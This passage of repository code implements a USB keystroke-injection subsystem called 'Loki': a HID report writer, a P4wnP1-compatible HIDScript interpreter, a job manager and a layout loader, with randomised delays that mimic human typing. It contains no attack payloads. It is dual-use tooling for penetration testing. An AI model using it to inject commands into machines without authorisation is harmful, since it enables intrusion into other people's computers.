"WINDOWS": (MOD_LEFT_GUI, KEY_NONE),
"COMMAND": (MOD_LEFT_GUI, KEY_NONE),
"META": (MOD_LEFT_GUI, KEY_NONE),
"RCTRL": (MOD_RIGHT_CONTROL, KEY_NONE),
"RSHIFT": (MOD_RIGHT_SHIFT, KEY_NONE),
"RALT": (MOD_RIGHT_ALT, KEY_NONE),
"RGUI": (MOD_RIGHT_GUI, KEY_NONE),
# Special keys
"ENTER": (MOD_NONE, KEY_ENTER),
"RETURN": (MOD_NONE, KEY_ENTER),
"ESC": (MOD_NONE, KEY_ESC),
"ESCAPE": (MOD_NONE, KEY_ESC),
"BACKSPACE": (MOD_NONE, KEY_BACKSPACE),
"TAB": (MOD_NONE, KEY_TAB),
"SPACE": (MOD_NONE, KEY_SPACE),
"CAPSLOCK": (MOD_NONE, KEY_CAPSLOCK),
"DELETE": (MOD_NONE, KEY_DELETE),
"INSERT": (MOD_NONE, KEY_INSERT),
"HOME": (MOD_NONE, KEY_HOME),
"END": (MOD_NONE, KEY_END),
"PAGEUP": (MOD_NONE, KEY_PAGEUP),
"PAGEDOWN": (MOD_NONE, KEY_PAGEDOWN),
"UP": (MOD_NONE, KEY_UP),
"DOWN": (MOD_NONE, KEY_DOWN),
"LEFT": (MOD_NONE, KEY_LEFT),
"RIGHT": (MOD_NONE, KEY_RIGHT),
"PRINTSCREEN": (MOD_NONE, KEY_PRINTSCREEN),
"SCROLLLOCK": (MOD_NONE, KEY_SCROLLLOCK),
"PAUSE": (MOD_NONE, KEY_PAUSE),
"NUMLOCK": (MOD_NONE, KEY_NUMLOCK),
# F keys
"F1": (MOD_NONE, KEY_F1), "F2": (MOD_NONE, KEY_F2),
"F3": (MOD_NONE, KEY_F3), "F4": (MOD_NONE, KEY_F4),
"F5": (MOD_NONE, KEY_F5), "F6": (MOD_NONE, KEY_F6),
"F7": (MOD_NONE, KEY_F7), "F8": (MOD_NONE, KEY_F8),
"F9": (MOD_NONE, KEY_F9), "F10": (MOD_NONE, KEY_F10),
"F11": (MOD_NONE, KEY_F11), "F12": (MOD_NONE, KEY_F12),
# Letters (for combo usage like "GUI r")
"A": (MOD_NONE, KEY_A), "B": (MOD_NONE, KEY_B),
"C": (MOD_NONE, KEY_C), "D": (MOD_NONE, KEY_D),
"E": (MOD_NONE, KEY_E), "F": (MOD_NONE, KEY_F),
"G": (MOD_NONE, KEY_G), "H": (MOD_NONE, KEY_H),
"I": (MOD_NONE, KEY_I), "J": (MOD_NONE, KEY_J),
"K": (MOD_NONE, KEY_K), "L": (MOD_NONE, KEY_L),
"M": (MOD_NONE, KEY_M), "N": (MOD_NONE, KEY_N),
"O": (MOD_NONE, KEY_O), "P": (MOD_NONE, KEY_P),
"Q": (MOD_NONE, KEY_Q), "R": (MOD_NONE, KEY_R),
"S": (MOD_NONE, KEY_S), "T": (MOD_NONE, KEY_T),
"U": (MOD_NONE, KEY_U), "V": (MOD_NONE, KEY_V),
"W": (MOD_NONE, KEY_W), "X": (MOD_NONE, KEY_X),
"Y": (MOD_NONE, KEY_Y), "Z": (MOD_NONE, KEY_Z),
}
# ── LED bitmasks (host → device output report) ────────────────
LED_NUM = 0x01
LED_CAPS = 0x02
LED_SCROLL = 0x04
LED_ANY = 0xFF
class HIDController:
"""Low-level USB HID report writer."""
def __init__(self):
self._kbd_fd = None # /dev/hidg0
self._mouse_fd = None # /dev/hidg1
self._layout = load_layout("us")
self._speed_min = 0 # ms between keystrokes (0 = instant)
self._speed_max = 0
# ── Lifecycle ──────────────────────────────────────────────
def open(self):
"""Open HID gadget device files."""
try:
self._kbd_fd = os.open("/dev/hidg0", os.O_RDWR | os.O_NONBLOCK)
logger.info("Opened /dev/hidg0 (keyboard)")
except OSError as e:
logger.error("Cannot open /dev/hidg0: %s", e)
raise
try:
self._mouse_fd = os.open("/dev/hidg1", os.O_RDWR | os.O_NONBLOCK)
logger.info("Opened /dev/hidg1 (mouse)")
except OSError as e:
logger.warning("Cannot open /dev/hidg1 (mouse disabled): %s", e)
self._mouse_fd = None
def close(self):
"""Close HID device files."""
self.release_all()
if self._kbd_fd is not None:
try:
os.close(self._kbd_fd)
except OSError:
pass
self._kbd_fd = None
if self._mouse_fd is not None:
try:
os.close(self._mouse_fd)
except OSError:
pass
self._mouse_fd = None
logger.debug("HID devices closed")
@property
def is_open(self) -> bool:
return self._kbd_fd is not None
# ── Layout ─────────────────────────────────────────────────
def set_layout(self, name: str):
"""Switch keyboard layout."""
self._layout = load_layout(name)
logger.debug("Layout switched to '%s'", name)
def set_typing_speed(self, min_ms: int, max_ms: int):
"""Set random delay range between keystrokes (ms)."""
self._speed_min = max(0, min_ms)
self._speed_max = max(self._speed_min, max_ms)
# ── Keyboard Reports ───────────────────────────────────────
def send_key_report(self, modifiers: int, keys: list):
"""Send an 8-byte keyboard report: [mod, 0x00, key1..key6]."""
if self._kbd_fd is None:
return
report = bytearray(8)
report[0] = modifiers & 0xFF
for i, k in enumerate(keys[:6]):
report[2 + i] = k & 0xFF
os.write(self._kbd_fd, bytes(report))
def release_all(self):
"""Send empty keyboard + mouse reports (release everything)."""
if self._kbd_fd is not None:
try:
os.write(self._kbd_fd, bytes(8))
except OSError:
pass
if self._mouse_fd is not None:
try:
os.write(self._mouse_fd, bytes([0x01, 0, 0, 0, 0, 0]))
except OSError:
pass
def press_combo(self, combo_str: str):
"""Press a key combination like 'GUI r', 'CTRL ALT DELETE'.
Keys are separated by spaces. All are pressed simultaneously, then released.
"""
parts = combo_str.strip().split()
mod_mask = 0
keycodes = []
for part in parts:
upper = part.upper()
if upper in _COMBO_MAP:
m, k = _COMBO_MAP[upper]
mod_mask |= m
if k != KEY_NONE:
keycodes.append(k)
else:
# Try single char via layout
if len(part) == 1 and part in self._layout:
char_mod, char_key = self._layout[part]
mod_mask |= char_mod
keycodes.append(char_key)
else:
logger.warning("Unknown combo key: '%s'", part)
if keycodes or mod_mask:
self.send_key_report(mod_mask, keycodes)
time.sleep(0.02)
self.send_key_report(0, []) # release
def type_string(self, text: str, stop_event: Event = None):
"""Type a string character by character using the current layout."""
for ch in text:
if stop_event and stop_event.is_set():
return
if ch in self._layout:
mod, key = self._layout[ch]
self.send_key_report(mod, [key])
time.sleep(0.01)
self.send_key_report(0, []) # release
else:
logger.warning("Unmapped char: %r", ch)
continue
# Inter-keystroke delay
if self._speed_max > 0:
delay = random.randint(self._speed_min, self._speed_max) / 1000.0
if stop_event:
stop_event.wait(delay)
else:
time.sleep(delay)
else:
time.sleep(0.005) # tiny default gap for reliability
# ── LED State ──────────────────────────────────────────────
def read_led_state(self) -> int:
"""Read current LED state from host (non-blocking). Returns bitmask."""
if self._kbd_fd is None:
return 0
try:
r, _, _ = select.select([self._kbd_fd], [], [], 0)
if r:
data = os.read(self._kbd_fd, 1)
if data:
return data[0]
except OSError:
pass
return 0
def wait_led(self, mask: int, stop_event: Event = None, timeout: float = 0):
"""Block until host LED state matches mask.
mask=LED_ANY matches any LED change.
Returns True if matched, False if stopped/timed out.
"""
start = time.monotonic()
initial = self.read_led_state()
while True:
if stop_event and stop_event.is_set():
return False
if timeout > 0 and (time.monotonic() - start) > timeout:
return False
current = self.read_led_state()
if mask == LED_ANY:
if current != initial:
return True
else:
if current & mask:
return True
time.sleep(0.05)
def wait_led_repeat(self, mask: int, count: int, stop_event: Event = None):
"""Wait for LED to toggle count times."""
for _ in range(count):
if not self.wait_led(mask, stop_event):
return False
return True
# ── Mouse Reports ──────────────────────────────────────────
# P4wnP1 mouse descriptor uses Report ID 1 for relative mode.
# Report format: [0x01, buttons, X, Y, 0x00, 0x00] = 6 bytes
def send_mouse_report(self, buttons: int, x: int, y: int, wheel: int = 0):
"""Send a 6-byte relative mouse report with Report ID 1.
Format: [report_id=1, buttons, X, Y, pad, pad]
"""
if self._mouse_fd is None:
return
# Clamp to signed byte range
x = max(-127, min(127, x))
y = max(-127, min(127, y))
report = struct.pack("BBbbBB", 0x01, buttons & 0xFF, x, y, 0, 0)
os.write(self._mouse_fd, report)
def mouse_move(self, x: int, y: int):
"""Move mouse by (x, y) relative pixels."""
self.send_mouse_report(0, x, y)
def mouse_move_stepped(self, x: int, y: int, step: int = 10):
"""Move mouse in small increments for better tracking."""
while x != 0 or y != 0:
dx = max(-step, min(step, x))
dy = max(-step, min(step, y))
self.send_mouse_report(0, dx, dy)
x -= dx
y -= dy
time.sleep(0.005)
def mouse_click(self, button: int = 1):
"""Click a mouse button (1=left, 2=right, 4=middle)."""
self.send_mouse_report(button, 0, 0)
time.sleep(0.05)
self.send_mouse_report(0, 0, 0)
def mouse_double_click(self, button: int = 1):
"""Double-click a mouse button."""
self.mouse_click(button)
time.sleep(0.05)
self.mouse_click(button)

748
loki/hidscript.py Normal file
View File

@@ -0,0 +1,748 @@
"""
HIDScript parser and executor for Loki.
Supports P4wnP1-compatible HIDScript syntax:
- Function calls: type("hello"); press("GUI r"); delay(500);
- var declarations: var x = 1;
- for / while loops
- if / else conditionals
- // and /* */ comments
- String concatenation with +
- Basic arithmetic (+, -, *, /)
- console.log() for job output
Zero external dependencies — pure Python DSL parser.
"""
import re
import time
import logging
from threading import Event
from logger import Logger
logger = Logger(name="loki.hidscript", level=logging.DEBUG)
# ── LED constants (available in scripts) ──────────────────────
NUM = 0x01
CAPS = 0x02
SCROLL = 0x04
ANY = 0xFF
# ── Mouse button constants ────────────────────────────────────
BT1 = 1 # Left
BT2 = 2 # Right
BT3 = 4 # Middle
BTNONE = 0
class HIDScriptError(Exception):
"""Error during HIDScript execution."""
def __init__(self, message, line=None):
self.line = line
super().__init__(f"Line {line}: {message}" if line else message)
class HIDScriptParser:
"""Parse and execute P4wnP1-compatible HIDScript."""
def __init__(self, hid_controller, layout="us"):
self.hid = hid_controller
self._default_layout = layout
self._output = [] # console.log output
def execute(self, source: str, stop_event: Event = None, job_id: str = ""):
"""Parse and execute a HIDScript source string.
Returns list of console.log output lines.
"""
self._output = []
self._stop = stop_event or Event()
self._vars = {
# Built-in constants
"NUM": NUM, "CAPS": CAPS, "SCROLL": SCROLL, "ANY": ANY,
"BT1": BT1, "BT2": BT2, "BT3": BT3, "BTNONE": BTNONE,
"true": True, "false": False, "null": None,
}
# Strip comments
source = self._strip_comments(source)
# Tokenize into statements
stmts = self._parse_block(source)
# Execute
self._exec_stmts(stmts)
return self._output
# ── Comment stripping ──────────────────────────────────────
def _strip_comments(self, source: str) -> str:
"""Remove // and /* */ comments."""
# Block comments first
source = re.sub(r'/\*.*?\*/', '', source, flags=re.DOTALL)
# Line comments
source = re.sub(r'//[^\n]*', '', source)
return source
# ── Parser ─────────────────────────────────────────────────
def _parse_block(self, source: str) -> list:
"""Parse source into a list of statement dicts."""
stmts = []
pos = 0
source = source.strip()
while pos < len(source):
if self._stop.is_set():
break
pos = self._skip_ws(source, pos)
if pos >= len(source):
break
# var declaration
if source[pos:pos+4] == 'var ' or source[pos:pos+4] == 'let ':
end = source.find(';', pos)
if end == -1:
end = len(source)
decl = source[pos+4:end].strip()
eq = decl.find('=')
if eq >= 0:
name = decl[:eq].strip()
value_expr = decl[eq+1:].strip()
stmts.append({"type": "assign", "name": name, "expr": value_expr})
else:
stmts.append({"type": "assign", "name": decl.strip(), "expr": "null"})
pos = end + 1
# for loop
elif source[pos:pos+4] == 'for ' or source[pos:pos+4] == 'for(':
stmt, pos = self._parse_for(source, pos)
stmts.append(stmt)
# while loop
elif source[pos:pos+6] == 'while ' or source[pos:pos+6] == 'while(':
stmt, pos = self._parse_while(source, pos)
stmts.append(stmt)
# if statement
elif source[pos:pos+3] == 'if ' or source[pos:pos+3] == 'if(':
stmt, pos = self._parse_if(source, pos)
stmts.append(stmt)
# Block: { ... }
elif source[pos] == '{':
end = self._find_matching_brace(source, pos)
inner = source[pos+1:end]
stmts.extend(self._parse_block(inner))
pos = end + 1
# Expression statement (function call or assignment)
else:
end = source.find(';', pos)
if end == -1:
end = len(source)
expr = source[pos:end].strip()
if expr:
# Check for assignment: name = expr
m = re.match(r'^([a-zA-Z_]\w*)\s*=\s*(.+)$', expr)
if m and not expr.startswith('=='):
stmts.append({"type": "assign", "name": m.group(1), "expr": m.group(2)})
else:
stmts.append({"type": "expr", "expr": expr})
pos = end + 1
return stmts
def _parse_for(self, source, pos):
"""Parse: for (init; cond; incr) { body }"""
# Find parenthesized header
p_start = source.index('(', pos)
p_end = self._find_matching_paren(source, p_start)
header = source[p_start+1:p_end]
parts = header.split(';')
if len(parts) != 3:
raise HIDScriptError("Invalid for loop header")
init_expr = parts[0].strip()
cond_expr = parts[1].strip()
incr_expr = parts[2].strip()
# Remove var/let prefix from init
for prefix in ('var ', 'let '):
if init_expr.startswith(prefix):
init_expr = init_expr[len(prefix):]
# Find body
body_start = self._skip_ws(source, p_end + 1)
if body_start < len(source) and source[body_start] == '{':
body_end = self._find_matching_brace(source, body_start)
body = source[body_start+1:body_end]
next_pos = body_end + 1
else:
semi = source.find(';', body_start)
if semi == -1:
semi = len(source)
body = source[body_start:semi]
next_pos = semi + 1
return {
"type": "for",
"init": init_expr,
"cond": cond_expr,
"incr": incr_expr,
"body": body,
}, next_pos
def _parse_while(self, source, pos):
"""Parse: while (cond) { body }"""
p_start = source.index('(', pos)
p_end = self._find_matching_paren(source, p_start)
cond = source[p_start+1:p_end].strip()
body_start = self._skip_ws(source, p_end + 1)
if body_start < len(source) and source[body_start] == '{':
body_end = self._find_matching_brace(source, body_start)
body = source[body_start+1:body_end]
next_pos = body_end + 1
else:
semi = source.find(';', body_start)
if semi == -1:
semi = len(source)
body = source[body_start:semi]
next_pos = semi + 1
return {"type": "while", "cond": cond, "body": body}, next_pos
def _parse_if(self, source, pos):
"""Parse: if (cond) { body } [else { body }]"""
p_start = source.index('(', pos)
p_end = self._find_matching_paren(source, p_start)
cond = source[p_start+1:p_end].strip()
body_start = self._skip_ws(source, p_end + 1)
if body_start < len(source) and source[body_start] == '{':
body_end = self._find_matching_brace(source, body_start)
body = source[body_start+1:body_end]
next_pos = body_end + 1
else:
semi = source.find(';', body_start)
if semi == -1:
semi = len(source)
body = source[body_start:semi]
next_pos = semi + 1
# Check for else
else_body = None
check = self._skip_ws(source, next_pos)
if source[check:check+4] == 'else':
after_else = self._skip_ws(source, check + 4)
if after_else < len(source) and source[after_else] == '{':
eb_end = self._find_matching_brace(source, after_else)
else_body = source[after_else+1:eb_end]
next_pos = eb_end + 1
elif source[after_else:after_else+2] == 'if':
# else if — parse recursively
inner_if, next_pos = self._parse_if(source, after_else)
else_body = inner_if # will be a dict, handle in exec
else:
semi = source.find(';', after_else)
if semi == -1:
semi = len(source)
else_body = source[after_else:semi]
next_pos = semi + 1
return {"type": "if", "cond": cond, "body": body, "else": else_body}, next_pos
# ── Executor ───────────────────────────────────────────────
def _exec_stmts(self, stmts: list):
"""Execute a list of parsed statements."""
for stmt in stmts:
if self._stop.is_set():
return
stype = stmt["type"]
if stype == "assign":
self._vars[stmt["name"]] = self._eval_expr(stmt["expr"])
elif stype == "expr":
self._eval_expr(stmt["expr"])
elif stype == "for":
self._exec_for(stmt)
elif stype == "while":
self._exec_while(stmt)
elif stype == "if":
self._exec_if(stmt)
def _exec_for(self, stmt):
"""Execute a for loop."""
# Parse init as assignment
init = stmt["init"]
eq = init.find('=')
if eq >= 0:
name = init[:eq].strip()
self._vars[name] = self._eval_expr(init[eq+1:].strip())
max_iterations = 100000
i = 0
while i < max_iterations:
if self._stop.is_set():
return
if not self._eval_expr(stmt["cond"]):
break
self._exec_stmts(self._parse_block(stmt["body"]))
# Execute increment
incr = stmt["incr"]
if "++" in incr:
var_name = incr.replace("++", "").strip()
self._vars[var_name] = self._vars.get(var_name, 0) + 1
elif "--" in incr:
var_name = incr.replace("--", "").strip()
self._vars[var_name] = self._vars.get(var_name, 0) - 1
else:
eq = incr.find('=')
if eq >= 0:
name = incr[:eq].strip()
self._vars[name] = self._eval_expr(incr[eq+1:].strip())
i += 1
def _exec_while(self, stmt):
"""Execute a while loop."""
max_iterations = 1000000
i = 0
while i < max_iterations:
if self._stop.is_set():
return
if not self._eval_expr(stmt["cond"]):
break
self._exec_stmts(self._parse_block(stmt["body"]))
i += 1
def _exec_if(self, stmt):
"""Execute an if/else statement."""
if self._eval_expr(stmt["cond"]):
self._exec_stmts(self._parse_block(stmt["body"]))
elif stmt.get("else"):
else_part = stmt["else"]
if isinstance(else_part, dict):
# else if
self._exec_if(else_part)
else:
self._exec_stmts(self._parse_block(else_part))
# ── Expression Evaluator ───────────────────────────────────
def _eval_expr(self, expr):
"""Evaluate an expression string and return its value."""
if isinstance(expr, (int, float, bool)):
return expr
if not isinstance(expr, str):
return expr
expr = expr.strip()
if not expr:
return None
# String literal
if (expr.startswith('"') and expr.endswith('"')) or \
(expr.startswith("'") and expr.endswith("'")):
return self._unescape(expr[1:-1])
# Numeric literal
try:
if '.' in expr:
return float(expr)
return int(expr)
except ValueError:
pass
# Boolean / null
if expr == 'true':
return True
if expr == 'false':
return False
if expr == 'null':
return None
# String concatenation with +
if self._has_top_level_op(expr, '+') and self._contains_string(expr):
parts = self._split_top_level(expr, '+')
result = ""
for p in parts:
val = self._eval_expr(p.strip())
result += str(val) if val is not None else ""
return result
# Comparison operators
for op in ['===', '!==', '==', '!=', '>=', '<=', '>', '<']:
if self._has_top_level_op(expr, op):
parts = self._split_top_level(expr, op, max_splits=1)
if len(parts) == 2:
left = self._eval_expr(parts[0].strip())
right = self._eval_expr(parts[1].strip())
if op in ('==', '==='):
return left == right
elif op in ('!=', '!=='):
return left != right
elif op == '>':
return left > right
elif op == '<':
return left < right
elif op == '>=':
return left >= right
elif op == '<=':
return left <= right
# Logical operators
if self._has_top_level_op(expr, '&&'):
parts = self._split_top_level(expr, '&&', max_splits=1)
return self._eval_expr(parts[0]) and self._eval_expr(parts[1])
if self._has_top_level_op(expr, '||'):
parts = self._split_top_level(expr, '||', max_splits=1)
return self._eval_expr(parts[0]) or self._eval_expr(parts[1])
# Arithmetic
for op in ['+', '-']:
if self._has_top_level_op(expr, op) and not self._contains_string(expr):
parts = self._split_top_level(expr, op)
result = self._eval_expr(parts[0].strip())
for p in parts[1:]:
val = self._eval_expr(p.strip())
if op == '+':
result = (result or 0) + (val or 0)
else:
result = (result or 0) - (val or 0)
return result
for op in ['*', '/']:
if self._has_top_level_op(expr, op):
parts = self._split_top_level(expr, op)
result = self._eval_expr(parts[0].strip())
for p in parts[1:]:
val = self._eval_expr(p.strip())
if op == '*':
result = (result or 0) * (val or 0)
else:
result = (result or 0) / (val or 1)
return result
# Modulo
if self._has_top_level_op(expr, '%'):
parts = self._split_top_level(expr, '%')
result = self._eval_expr(parts[0].strip())
for p in parts[1:]:
val = self._eval_expr(p.strip())
result = (result or 0) % (val or 1)
return result
# Negation
if expr.startswith('!'):
return not self._eval_expr(expr[1:])
# Parenthesized expression
if expr.startswith('(') and self._find_matching_paren(expr, 0) == len(expr) - 1:
return self._eval_expr(expr[1:-1])
# Function call
m = re.match(r'^([a-zA-Z_][\w.]*)\s*\(', expr)
if m:
func_name = m.group(1)
p_start = expr.index('(')
p_end = self._find_matching_paren(expr, p_start)
args_str = expr[p_start+1:p_end]
args = self._parse_args(args_str)
return self._call_func(func_name, args)
# Variable reference
if re.match(r'^[a-zA-Z_]\w*$', expr):
return self._vars.get(expr, 0)
# Increment/decrement as expression
if expr.endswith('++'):
name = expr[:-2].strip()
val = self._vars.get(name, 0)
self._vars[name] = val + 1
return val
if expr.endswith('--'):
name = expr[:-2].strip()
val = self._vars.get(name, 0)
self._vars[name] = val - 1
return val
logger.warning("Cannot evaluate expression: %r", expr)
return 0
# ── Built-in Functions ─────────────────────────────────────
def _call_func(self, name: str, args: list):
"""Dispatch a built-in function call."""
# Evaluate all arguments
evaled = [self._eval_expr(a) for a in args]
if name == "type":
text = str(evaled[0]) if evaled else ""
self.hid.type_string(text, stop_event=self._stop)
elif name == "press":
combo = str(evaled[0]) if evaled else ""
self.hid.press_combo(combo)
elif name == "delay":
ms = int(evaled[0]) if evaled else 0
if ms > 0:
self._stop.wait(ms / 1000.0)
elif name == "layout":
name_val = str(evaled[0]) if evaled else self._default_layout
self.hid.set_layout(name_val)
elif name == "typingSpeed":
min_ms = int(evaled[0]) if len(evaled) > 0 else 0
max_ms = int(evaled[1]) if len(evaled) > 1 else min_ms
self.hid.set_typing_speed(min_ms, max_ms)
elif name == "move":
x = int(evaled[0]) if len(evaled) > 0 else 0
y = int(evaled[1]) if len(evaled) > 1 else 0
self.hid.mouse_move(x, y)
elif name == "moveTo":
x = int(evaled[0]) if len(evaled) > 0 else 0
y = int(evaled[1]) if len(evaled) > 1 else 0
self.hid.mouse_move_stepped(x, y, step=5)
elif name == "moveStepped":
x = int(evaled[0]) if len(evaled) > 0 else 0
y = int(evaled[1]) if len(evaled) > 1 else 0
step = int(evaled[2]) if len(evaled) > 2 else 10
self.hid.mouse_move_stepped(x, y, step=step)
elif name == "click":
btn = int(evaled[0]) if evaled else BT1
self.hid.mouse_click(btn)
elif name == "doubleClick":
btn = int(evaled[0]) if evaled else BT1
self.hid.mouse_double_click(btn)
elif name == "button":
mask = int(evaled[0]) if evaled else 0
self.hid.send_mouse_report(mask, 0, 0)
elif name == "waitLED":
mask = int(evaled[0]) if evaled else ANY
timeout = float(evaled[1]) / 1000 if len(evaled) > 1 else 0
return self.hid.wait_led(mask, self._stop, timeout)
elif name == "waitLEDRepeat":
mask = int(evaled[0]) if evaled else ANY
count = int(evaled[1]) if len(evaled) > 1 else 1
return self.hid.wait_led_repeat(mask, count, self._stop)
elif name == "console.log" or name == "log":
msg = " ".join(str(a) for a in evaled)
self._output.append(msg)
logger.debug("[HIDScript] %s", msg)
elif name in ("parseInt", "Number"):
try:
return int(float(evaled[0])) if evaled else 0
except (ValueError, TypeError):
return 0
elif name == "String":
return str(evaled[0]) if evaled else ""
elif name == "Math.random":
import random
return random.random()
elif name == "Math.floor":
import math
return math.floor(evaled[0]) if evaled else 0
else:
logger.warning("Unknown function: %s", name)
return None
return None
# ── Helpers ────────────────────────────────────────────────
def _parse_args(self, args_str: str) -> list:
"""Split function arguments respecting string literals and parens."""
args = []
depth = 0
current = ""
in_str = None
for ch in args_str:
if in_str:
current += ch
if ch == in_str and (len(current) < 2 or current[-2] != '\\'):
in_str = None
elif ch in ('"', "'"):
in_str = ch
current += ch
elif ch == '(':
depth += 1
current += ch
elif ch == ')':
depth -= 1
current += ch
elif ch == ',' and depth == 0:
if current.strip():
args.append(current.strip())
current = ""
else:
current += ch
if current.strip():
args.append(current.strip())
return args
def _unescape(self, s: str) -> str:
"""Process escape sequences in a string."""
return s.replace('\\n', '\n').replace('\\t', '\t').replace('\\r', '\r') \
.replace('\\"', '"').replace("\\'", "'").replace('\\\\', '\\')
def _skip_ws(self, source: str, pos: int) -> int:
"""Skip whitespace."""
while pos < len(source) and source[pos] in ' \t\n\r':
pos += 1
return pos
def _find_matching_brace(self, source: str, pos: int) -> int:
"""Find matching } for { at pos."""
depth = 1
i = pos + 1
in_str = None
while i < len(source):
ch = source[i]
if in_str:
if ch == in_str and source[i-1] != '\\':
in_str = None
elif ch in ('"', "'"):
in_str = ch
elif ch == '{':
depth += 1
elif ch == '}':
depth -= 1
if depth == 0:
return i
i += 1
return len(source) - 1
def _find_matching_paren(self, source: str, pos: int) -> int:
"""Find matching ) for ( at pos."""
depth = 1
i = pos + 1
in_str = None
while i < len(source):
ch = source[i]
if in_str:
if ch == in_str and source[i-1] != '\\':
in_str = None
elif ch in ('"', "'"):
in_str = ch
elif ch == '(':
depth += 1
elif ch == ')':
depth -= 1
if depth == 0:
return i
i += 1
return len(source) - 1
def _has_top_level_op(self, expr: str, op: str) -> bool:
"""Check if operator exists at top level (not inside parens/strings)."""
depth = 0
in_str = None
i = 0
while i < len(expr):
ch = expr[i]
if in_str:
if ch == in_str and (i == 0 or expr[i-1] != '\\'):
in_str = None
elif ch in ('"', "'"):
in_str = ch
elif ch == '(':
depth += 1
elif ch == ')':
depth -= 1
elif depth == 0 and expr[i:i+len(op)] == op:
# Don't match multi-char ops that are substrings of longer ones
if len(op) == 1 and op in '+-':
# Skip if part of ++ or --
if i + 1 < len(expr) and expr[i+1] == op:
i += 2
continue
if i > 0 and expr[i-1] == op:
i += 1
continue
return True
i += 1
return False
def _split_top_level(self, expr: str, op: str, max_splits: int = -1) -> list:
"""Split expression by operator at top level only."""
parts = []
depth = 0
in_str = None
current = ""
i = 0
splits = 0
while i < len(expr):
ch = expr[i]
if in_str:
current += ch
if ch == in_str and (i == 0 or expr[i-1] != '\\'):
in_str = None
elif ch in ('"', "'"):
in_str = ch
current += ch
elif ch == '(':
depth += 1
current += ch
elif ch == ')':
depth -= 1
current += ch
elif depth == 0 and expr[i:i+len(op)] == op and (max_splits < 0 or splits < max_splits):
# Don't split on ++ or -- when looking for + or -
if len(op) == 1 and op in '+-':
if i + 1 < len(expr) and expr[i+1] == op:
current += ch
i += 1
current += expr[i]
i += 1
continue
parts.append(current)
current = ""
i += len(op)
splits += 1
continue
else:
current += ch
i += 1
parts.append(current)
return parts
def _contains_string(self, expr: str) -> bool:
"""Check if expression contains a string literal at top level."""
depth = 0
in_str = None
for ch in expr:
if in_str:
if ch == in_str:
return True # Found complete string
elif ch in ('"', "'"):
in_str = ch
elif ch == '(':
depth += 1
elif ch == ')':
depth -= 1
return False

162
loki/jobs.py Normal file
View File

@@ -0,0 +1,162 @@
"""
Loki job manager — tracks HIDScript execution jobs.
Each job runs in its own daemon thread.
"""
import uuid
import time
import logging
import traceback
from datetime import datetime
from threading import Thread, Event
from logger import Logger
logger = Logger(name="loki.jobs", level=logging.DEBUG)
class LokiJobManager:
"""Manages HIDScript job lifecycle."""
def __init__(self, engine):
self.engine = engine
self._jobs = {} # job_id → job dict
self._threads = {} # job_id → Thread
self._stops = {} # job_id → Event
def create_job(self, script_name: str, script_content: str) -> str:
"""Create and start a new job. Returns job_id (UUID)."""
job_id = str(uuid.uuid4())[:8]
now = datetime.now().isoformat()
job = {
"id": job_id,
"script_name": script_name,
"status": "pending",
"output": "",
"error": "",
"started_at": None,
"finished_at": None,
"created_at": now,
}
self._jobs[job_id] = job
stop = Event()
self._stops[job_id] = stop
# Persist to DB
try:
db = self.engine.shared_data.db
db.execute(
"INSERT INTO loki_jobs (id, script_name, status, created_at) VALUES (?, ?, ?, ?)",
(job_id, script_name, "pending", now)
)
except Exception as e:
logger.error("DB insert job error: %s", e)
# Start execution thread
t = Thread(
target=self._run_job,
args=(job_id, script_content, stop),
daemon=True,
name=f"loki-job-{job_id}",
)
self._threads[job_id] = t
t.start()
logger.info("Job %s created: %s", job_id, script_name)
return job_id
def cancel_job(self, job_id: str) -> bool:
"""Cancel a running job."""
stop = self._stops.get(job_id)
if stop:
stop.set()
job = self._jobs.get(job_id)
if job and job["status"] == "running":
job["status"] = "cancelled"
job["finished_at"] = datetime.now().isoformat()
self._update_db(job_id, "cancelled", job.get("output", ""), "Cancelled by user")
logger.info("Job %s cancelled", job_id)
return True
return False
def get_all_jobs(self) -> list:
"""Return list of all jobs (most recent first)."""
jobs = list(self._jobs.values())
jobs.sort(key=lambda j: j.get("created_at", ""), reverse=True)
return jobs
def get_job(self, job_id: str) -> dict:
"""Get a single job by ID."""
return self._jobs.get(job_id)
def clear_completed(self):
"""Remove finished/failed/cancelled jobs from memory."""
to_remove = [
jid for jid, j in self._jobs.items()
if j["status"] in ("succeeded", "failed", "cancelled")
]
for jid in to_remove:
self._jobs.pop(jid, None)
self._threads.pop(jid, None)
self._stops.pop(jid, None)
try:
self.engine.shared_data.db.execute(
"DELETE FROM loki_jobs WHERE status IN ('succeeded', 'failed', 'cancelled')"
)
except Exception as e:
logger.error("DB clear jobs error: %s", e)
@property
def running_count(self) -> int:
return sum(1 for j in self._jobs.values() if j["status"] == "running")
# ── Internal ───────────────────────────────────────────────
def _run_job(self, job_id: str, script_content: str, stop: Event):
"""Execute a HIDScript in this thread."""
job = self._jobs[job_id]
job["status"] = "running"
job["started_at"] = datetime.now().isoformat()
self._update_db(job_id, "running")
try:
from loki.hidscript import HIDScriptParser
parser = HIDScriptParser(self.engine.hid_controller)
output_lines = parser.execute(script_content, stop_event=stop, job_id=job_id)
if stop.is_set():
job["status"] = "cancelled"
else:
job["status"] = "succeeded"
job["output"] = "\n".join(output_lines)
except Exception as e:
job["status"] = "failed"
job["error"] = str(e)
job["output"] = traceback.format_exc()
logger.error("Job %s failed: %s", job_id, e)
finally:
job["finished_at"] = datetime.now().isoformat()
self._update_db(
job_id, job["status"],
job.get("output", ""),
job.get("error", ""),
)
logger.info("Job %s finished: %s", job_id, job["status"])
def _update_db(self, job_id: str, status: str, output: str = "", error: str = ""):
"""Persist job state to database."""
try:
db = self.engine.shared_data.db
db.execute(
"UPDATE loki_jobs SET status=?, output=?, error=?, "
"started_at=?, finished_at=? WHERE id=?",
(status, output, error,
self._jobs.get(job_id, {}).get("started_at"),
self._jobs.get(job_id, {}).get("finished_at"),
job_id)
)
except Exception as e:
logger.error("DB update job error: %s", e)

45
loki/layouts/__init__.py Normal file
View File

@@ -0,0 +1,45 @@
"""
Keyboard layout loader for Loki HID subsystem.
Caches loaded layouts in memory.
"""
import json
import os
import logging
from logger import Logger
logger = Logger(name="loki.layouts", level=logging.DEBUG)
_LAYOUT_DIR = os.path.dirname(os.path.abspath(__file__))
_cache = {}
def load(name: str = "us") -> dict:
"""Load a keyboard layout by name. Returns char → (modifier, keycode) map."""
name = name.lower()
if name in _cache:
return _cache[name]
path = os.path.join(_LAYOUT_DIR, f"{name}.json")
if not os.path.isfile(path):
logger.warning("Layout '%s' not found, falling back to 'us'", name)
path = os.path.join(_LAYOUT_DIR, "us.json")
name = "us"
if name in _cache:
return _cache[name]
